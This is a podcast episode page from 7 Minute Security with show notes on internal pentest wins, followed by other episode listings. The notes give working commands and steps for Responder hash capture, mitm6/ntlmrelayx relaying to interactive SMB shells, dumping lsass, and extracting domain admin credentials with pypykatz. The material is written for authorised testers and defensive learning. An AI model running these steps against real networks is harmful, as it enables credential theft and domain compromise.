7MS #423: Tales of Internal Pentest Pwnage - Part 18
7 Minute Security15 Heinä 2020

7MS #423: Tales of Internal Pentest Pwnage - Part 18

This is an especially fun tale of pentest pwnage because it involves D.D.A.D. (Double Domain Admin Dance) and varying T.T.D.A. (Time to Domain Admin). The key takeaways I want to share from these tests are as follows:

  • Responder.py -i eth0 -rPv is AWESOME. It can make the network rain hashes like manna from heaven!
  • Testing the egress firewall is easy with this script. Consider this SANS article for guidance on ports to lock down.
  • Testing for MS14-025 is easy with this site.
  • mitm6 and ntlmrelayx can work really well together to rain shells if you follow this article. It's especially handy/focused when you create a targets.txt that looks something like this:
smb://CORP\Administrator@192.168.195.2 smb://CORP\Administrator@192.168.195.3 smb://CORP\brian.admin@192.168.195.7 192.168.195.7 192.168.195.10

Then save that as your targets.txt and run ntlmrelayx with ./ntlmrelayx.py -tf /targets.txt -socks -smb2support. From there, once you get active socks connections, you can connect to them directly with a full interactive shell with something like proxychains smbclient //192.168.195.2/ -U CORP/brian.admin

  • I ran into a weird issue with CrackMapExec where the --local-auth flag didn't seem to be working so I ended up trying the binary version and then it worked like a champ!

  • Looking to dump lsass a "clean" way? Try RDPing in directly to the victim machine, opening up taskmgr.exe, click the Details tab, then right-click lsass.exe and choose Create dump file and bam, done.

  • Wanna spin up a quick SMB share from your Kali box? Try smbserver.py -smb2support share /share

  • Then, once you've pulled back the lsass.dmp file, you can rip through it easily with:

pip3 install pypykatz sudo pypykatz lsa minidump lsass.dmp > lsass.txt

Then comb through lsass.txt and hopefully there will be some delicious and nutritious DA creds there for you to much on!

Jaksot(682)

7MS #659: Eating the Security Dog Food - Part 8

7MS #659: Eating the Security Dog Food - Part 8

Today I’m excited about some tools/automation I’ve been working on to help shore up the 7MinSec security program, including: Using Retype as a document repository Leveraging the Nessus API to automate the downloading/correlating of scan data Monitoring markdown files for “last update” changes using a basic Python script

24 Tammi 28min

7MS #658: WPA3 Downgrade Attacks

7MS #658: WPA3 Downgrade Attacks

Hey friends, today we cover: The shiny new 7MinSec Club BPATTY updates A talk-through of the WPA3 downgrade attack, complemented by the YouTube livestream

17 Tammi 32min

7MS #657: Writing Rad Security Documentation with Retype

7MS #657: Writing Rad Security Documentation with Retype

Hello friends!  Today we’re talking about a neat and quick-to-setup documentation service called Retype.  In a nutshell, you can get Retype installed on GitHub pages in about 5 minutes and be writing beautiful markdown pages (with built-in search) immediately.  I still absolutely love Docusaurus, but I think Retype definitely gives it a run for its money.

10 Tammi 20min

7MS #656: How to Succeed in Business Without Really Crying - Part 21

7MS #656: How to Succeed in Business Without Really Crying - Part 21

Happy new year friends! Today we talk about business/personal resolutions, including: New year’s resolution on the 7MinSec biz side to have a better work/life balance New training offering in the works Considering Substack as a communications platform A mental health booster that I came across mostly by accident

3 Tammi 45min

7MS #655: Happy Hacking Holidays

7MS #655: Happy Hacking Holidays

Today we’re doing a milkshake of several topics: wireless pentest pwnage, automating the boring pentest stuff with cursor.ai, and some closing business thoughts at 7MinSec celebrates its 7th year as a security consultancy.  Links discussed today: AWUS036ACH wifi card (not my favorite anymore) Panda PAU09 N600 (love this one!) The very important Github issue that helped me better understand BPFs and WPA3 attacks TrustedSec article on WPA3 downgrade attacks

30 Joulu 202458min

7MS #654: Tales of Pentest Pwnage – Part 67

7MS #654: Tales of Pentest Pwnage – Part 67

Today we’ve got some super cool stuff to cover today!  First up, BPATTY v1.4 is out and has a slug of cool things: A whole new section on old-school wifi tools like airmon-ng, aireplay-ng and airodump-ng Syntax on using two different tools to parse creds from Dehashed An updated tutorial on using Gophish for phishing campaigns The cocoa-flavored cherry on top is a tale of pentest pwnage that includes: Abusing SCCM Finding gold in SQL configuration/security audits

13 Joulu 202441min

7MS #653: How to Succeed in Business Without Really Crying – Part 20

7MS #653: How to Succeed in Business Without Really Crying – Part 20

Hey friends, today we’re talking about tips to effectively present your technical assessment to a variety of audiences – from lovely IT and security nerds to C-levels, the board and beyond!

6 Joulu 202449min

7MS #652: Securing Your Mental Health - Part 6

7MS #652: Securing Your Mental Health - Part 6

Today’s episode talks about some things that helped me get through a stressful and hospital-visit-filled Thanksgiving week, including: Journaling Meditation (An activity I’m ashamed of but has actually done wonders for my mental health)

2 Joulu 202441min

Suosittua kategoriassa Politiikka ja uutiset

rss-podme-livebox
ootsa-kuullut-tasta-2
aikalisa
otetaan-yhdet
et-sa-noin-voi-sanoo-esittaa
politiikan-puskaradio
rss-vaalirankkurit-podcast
rikosmyytit
aihe
rss-mina-ukkola
the-ulkopolitist
rss-tasta-on-kyse-ivan-puopolo-verkkouutiset
rss-kyselytunti
rss-aijat-hopottaa-podcast
rss-suoraan-asiaan
rss-kaikki-paskaksi-ystavat
rss-hyvaa-huomenta-bryssel
rss-tyolinjalla-pekka-sauri
rss-raha-talous-ja-politiikka
rss-kovin-paikka